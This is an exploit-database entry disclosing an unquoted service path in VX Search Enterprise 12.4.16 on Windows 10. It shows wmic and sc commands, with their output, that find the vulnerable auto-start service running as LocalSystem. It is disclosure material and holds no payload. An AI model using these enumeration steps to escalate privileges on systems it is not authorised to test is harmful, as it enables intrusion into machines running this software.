Exploit for VX Search Enterprise 12.4.16 Unquoted Service Path

## https://sploitus.com/exploit?id=PACKETSTORM:156374
Exploit Title: VX Search Enterprise v12.4.16 (x86) - 'VX Search Enterprise' Unquoted Service Path  
Exploit Author: boku  
Date: 02/10/2020  
Vendor Homepage: http://www.vxsearch.com  
Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v12.4.16.exe  
Version: 12.4.16  
Tested On: Windows 10 (32-bit)  
  
C:\Users\goku>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """  
VX Search Enterprise C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe Auto  
  
C:\Users\goku>sc qc "VX Search Enterprise"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: VX Search Enterprise  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 0 IGNORE  
BINARY_PATH_NAME : C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : VX Search Enterprise  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem